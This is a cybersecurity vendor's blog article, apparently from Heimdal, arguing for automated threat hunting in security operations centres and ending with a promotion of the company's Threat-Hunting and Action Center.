Contents:
Previously, we have touched upon the finer points of creating and implementing your very first threat-hunting framework. Now that you’ve mastered the core basics, it’s time to jump to the next level – streamlining your security operations through automated threat hunting. So, without further ado, let’s start talking about how you can add some automation muscle to your most important threat-hunting-related jobs. Enjoy and don’t forget to subscribe to Heimdal®’s newsletter for more goodies.
Breaking Away from Tradition with Automated Threat Hunting
Before we deep-dive into the specifics, we should set some time aside to bring up the elephant in the room – why should security specialists even consider the possibility of automation? Although lacking in maturity compared to some of the other “time-honored” detection, prevention, and mitigation methodologies, threat-hunting’s holistic approach to all of the aforementioned categories makes it the suitable – if not the sole – candidate to deal with modern cyber threats that stretch across multiple attack surfaces and incorporate such clever ploys, that they stand to outwit even the most seasoned security specialist.
Now as far as the scope is concerned, cyber threat hunting involves proactively searching organizational systems, networks, and/or for threats that are capable of circumventing traditional detection engines and methodologies. The ultimate goal is to track and counter threat actors as early as possible in each of the attack cycle sequences while improving both the velocity and accuracy of the organization’s response when faced with advanced threats.
So, what does it mean to engage in manual threat-hunting? Let’s consider the hunting lifecycle. As you probably know by now, any self-respectable SOC specialist must go through the five-phased plan: hypothesis, data collection & interpretation, testing, acting, and proactivity. In manual threat-hunting, each of these steps greatly depends on the knowledge and experience of the analyst conducting this investigation and, most importantly, on his pen & paper game. In other words, incident documentation which includes everything from POI (i.e. Point of Infiltration) to APT-specific TTPs, can aid the security specialist take prompt actions, mitigate post-infiltration aftereffects, and protect the organization’s assets against future occurrences. However, as you can imagine, this case-by-case approach (i.e., potentially mediated by pre-defined playbooks) can become highly inefficient when confronted with evil code capable of changing form, infiltrating via ‘untraditional’ paths, or even acting against detection & prevention systems.
Furthermore, manual threat-hunting systems can’t account for any of the many variations that make up today’s evil code; for instance, the polymorphic malware class is not only capable of mutating its appearance, but it can also alter its signature file by applying new decryption algorithms and/or routines. Ultimately, manual threat-hunting may simply become obsolete when facing the perspective of AI-powered malware, a menace that will soon become the norm; Protocol’s interview with cybersecurity expert Mikko Hyppönen reveals that APTs are perhaps a couple of years away from fully weaponizing Artificial Intelligence, while also adding that threat groups, such as the one behind the infamous Conti ransomware attack, are actively recruiting dissatisfied AI/ML engineers to further the development of this ‘project’.
Now, given the threatscape’s tectonic shifts, it’s more than obvious that threat-hunting might be stuck in the proverbial doldrums. To overcome this drawback, we need to move the needle in the direction of automation. Let’s start with the first item on your to-do list.
Eliminating time spent on menial tasks
One of the many (undisputable) merits of automation is ‘the ability’ to deliver a crippling blow to monotony. More specifically, some threat-hunting automation can aid you in spiking up the efficiency of your SOC team, by allowing it to (re)focus on high-priority jobs rather than menial tasks. Examples include setting up alerts using the results from previous detections, log management (the bane of any security specialist or IT administrator), setting up ticketing systems capable of auto-prioritizing events based on status quo (i.e., response vs. remediation), and cataloging anomalous behavior by leveraging custom reporting features.
Joining Efforts to Reduce False-Positive Rates
The man-meets-machine approach is not just a great plot for a sci-fi flick but something that can bring a positive impact on your entire threat-hunting effort. Let’s consider one of the fundamental aspects of this endeavor – data gathering and interpretation. As you probably know by now, all the data fed into such a system comes from all the corners of your infrastructure (i.e., threat intel, SIEM alerts, analytics, network data, endpoint & identity data). With such wide coverage, at times, it’s impossible to tell if the extracted bits paint the truth or if they are erroneous. Every scientific pursuit has its way to account for false positives, and threat-hunting makes no exception; fully automated event detection systems are bound to encounter bogus results. This is where the ‘human’ aspect kicks in. When interacting with such a system, the SOC specialist must ensure that the results are consistent all across the board and make corrections, if the situation dictates it.
From Prototype to Vital Business Unit
Any organization can opt-in for threat-hunting; whether we’re thinking about SIEM, SOAR, XDR, or anything in between, anyone with the right resources (and skillset) can deploy such an asset. However, simply ticking in just another box is not necessarily synonymous with having a (mature) threat-hunting program in place. Beyond flowcharts, hypotheses, playbooks, and everything in between there is a place called structured threat-hunting. In essence, this approach is based on harmonizing every bit of info about a malicious strain or attacker (i.e. IOAs, IOCs, and TTPs), in order to derive actionable detection grids, enforce new security policies and/or automated responses, mitigate known post-infiltration side-effects, and, of course, aid your SOC team in padding the organization’s overall security. With automated threat-hunting backed up by structure can make all the difference in the (cyber)world.
Heimdal®’s Approach to Automated Threat Hunting
Heimdal®’s Threat-Hunting and Action Center is the centerpiece of a hybrid approach to cybersecurity, intermixing elements from key ‘defense scape’ functional areas such as information security, IT auditing & consulting, threat intelligence, digital forensics, data analysis, and compliance in order to engineer a solution proficient at covering all conceivable attack vectors including, but not limited to spam, suboptimal credential generation, storage & management, Insider Threat, certificate theft, denial of service, physical theft, regulatory incompliance, data destruction, misconfiguration, IP leakage, and, phishing.
Conclusion
This wraps up my article on automated threat-hunting. Hope you’ve enjoyed it. Before I go, let me share with you a couple of insights that could aid you along the way. Threat-hunting needs three basic ingredients – time, knowledge, and resources. So, don’t expect things to happen overnight; people require training, the setup needs time, and, of course, special resources are needed for this type of enterprise.
If you liked this article, follow us on LinkedIn, Twitter, Facebook, and YouTube for more cybersecurity news and topics.